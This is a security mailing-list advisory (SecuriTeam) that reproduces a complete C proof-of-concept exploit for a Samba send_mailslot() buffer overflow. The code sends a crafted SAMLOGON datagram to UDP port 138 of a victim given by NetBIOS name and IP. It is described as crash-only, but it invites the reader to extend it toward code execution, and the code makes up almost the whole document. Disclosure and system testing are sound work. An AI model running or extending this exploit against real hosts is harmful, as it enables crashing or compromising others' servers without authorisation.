[EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
------------------------------------------------------------------------


SUMMARY

Secunia Research has discovered a vulnerability in Samba, which can be 
exploited by malicious people to compromise a vulnerable system, the 
following exploit code can be used to test your system for the mentioned 
vulnerability.

DETAILS

Exploit:
/*
 *
 * A remote attacker could send a specially crafted "SAMLOGON" domain
 * logon packet, possibly leading to the execution of arbitrary code with
 * elevated privileges. Note that this vulnerability is exploitable only
 * when domain logon support is enabled in Samba.
 *
 * ///////
 *
 * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], 
further exploitation or not.. is left as an exercise to the reader.
 *
 * laneleb & petemir, a true love in this world! hi!
 *
 * kangaroo kangaroo...
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <stdint.h>

/* smb ripped defines/etc */

#define MAX_DGRAM_SIZE 576
#define MAX_NETBIOSNAME_LEN 16
typedef char nstring[MAX_NETBIOSNAME_LEN];
typedef char unstring[MAX_NETBIOSNAME_LEN*4];
enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3};

#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const 
char *)(p2)))

#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const 
version of CVAL */
#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned 
char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8))

#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val)))
#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val))

/* A netbios name structure. */
struct nmb_name {
 nstring      name;
 char         scope[64];
 unsigned int name_type;
};

void safe_strcpy(char *a, char *b, uint32_t size)
{
    strcpy(b, a);
}

void put_name(char *dest, const char *name, int pad, unsigned int 
name_type)
{
    size_t len = strlen(name);

    memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? len : 
MAX_NETBIOSNAME_LEN - 1);
    if (len < MAX_NETBIOSNAME_LEN - 1)
    {
        memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len);
    }

    dest[MAX_NETBIOSNAME_LEN - 1] = name_type;
}

int put_nmb_name(char *buf,int offset,struct nmb_name *name)
{
    int ret,m;
    nstring buf1;
    char *p;

    if (strcmp(name->name,"*") == 0)
    {
        /* special case for wildcard name */
        put_name(buf1, "*", '\0', name->name_type);
    }
    else
    {
        put_name(buf1, name->name, ' ', name->name_type);
    }

    buf[offset] = 0x20;

    ret = 34;

    for (m=0;m<MAX_NETBIOSNAME_LEN;m++)
    {
        buf[offset+1+2*m] = 'A' + ((buf1[m]>>4)&0xF);
        buf[offset+2+2*m] = 'A' + (buf1[m]&0xF);
    }
    offset += 33;

    buf[offset] = 0;

    if (name->scope[0])
    {
        /* XXXX this scope handling needs testing */
        ret += strlen(name->scope) + 1;
        safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope));

        p = &buf[offset+1];
        while ((p = strchr(p,'.')))
        {
            buf[offset] = PTR_DIFF(p,&buf[offset+1]);
            offset += (buf[offset] + 1);
            p = &buf[offset+1];
        }
        buf[offset] = strlen(&buf[offset+1]);
    }

    return(ret);
}

typedef struct exudp_s
{
    unsigned char msg_type;
    unsigned char flags;
    uint16_t dgm_id;
    uint32_t source_ip;
    uint16_t source_port;
    uint16_t dgm_len;
    uint16_t pOffset;
    struct nmb_name source_name;
    struct nmb_name dest_name;
} exudp;

/* code */

int send_udp(int ip, char *packet, unsigned int packetSize)
{
    int fd;
    struct sockaddr_in to;
    int len;

    if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
        return 0;

    to.sin_family      = AF_INET;
    to.sin_addr.s_addr = ip;
    to.sin_port        = htons(138);

    if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, 
sizeof(struct sockaddr_in))) < 0)
    {
        perror("sendto");
        return 0;
    }

    return len;
}

int main(int argc, char *argv[])
{
    unsigned char samlogon[10240];
    unsigned int  nlOffset;
    exudp dgPacket;

    printf("smb_mailslot() POC by asmx86@gmail.com\n\n");

    if(argc < 3)
    {
        printf("Usage: %s <uppercase victim's netbios name> <victim's 
ip>\n\n", argv[0]);
        exit(1);
    }

    if(strlen(argv[1]) > 15)
    {
        printf("[!] netbios victim's name too long\n");
        exit(1);
    }

    memset(samlogon, 0, sizeof(samlogon));

    dgPacket.msg_type    = 0x11;
    dgPacket.flags       = 1;
    dgPacket.dgm_id      = 0xdead;
    dgPacket.source_ip   = 0xdeadbeef;
    dgPacket.source_port = 0xc0fe;
    dgPacket.dgm_len     = 0;
    dgPacket.pOffset     = 0;

    strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM");
    strcpy(dgPacket.dest_name.name, argv[1]);

    nlOffset = 14;

    nlOffset += put_nmb_name((char *)&samlogon, nlOffset, 
&dgPacket.source_name);
    nlOffset += put_nmb_name((char *)&samlogon, nlOffset, 
&dgPacket.dest_name);

#define OFFSET 97

    nlOffset -= 4;
    SCVAL(samlogon, nlOffset+4, 0);
    SSVAL(samlogon, nlOffset+4+OFFSET, 18);
    SCVAL(samlogon, nlOffset+7, 0);
    SCVAL(samlogon, nlOffset+8, 0x25);
    SSVAL(samlogon, nlOffset+59, 397);

    SSVAL(samlogon, nlOffset+61, OFFSET);

    SSVAL(samlogon, nlOffset+63, 0);

    SSVAL(samlogon, nlOffset+36, 12);
    memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21);

    memcpy(&samlogon[nlOffset+4+OFFSET+4],     "\x41\x00\x41\x00\x00\x00", 
6);
    memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 
6);
    memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260);               
    //play with this value ;)

    nlOffset = 576;

    dgPacket.dgm_len = nlOffset - 14;
    dgPacket.dgm_len = htons(dgPacket.dgm_len);

    memcpy(&samlogon, &dgPacket, 14);

    if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset))
        fprintf(stderr, "[!] Error sending UDP packet\n");
    else
        fprintf(stderr, "[*] packet sent\n");

    return 0;
}
//eof


ADDITIONAL INFORMATION

The information has been provided by  <mailto:asmx86@gmail.com> x 86.
The original article can be found at:  
<http://matiaslaporte.com.ar/descargas/smb_mailslot.c> 
http://matiaslaporte.com.ar/descargas/smb_mailslot.c



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.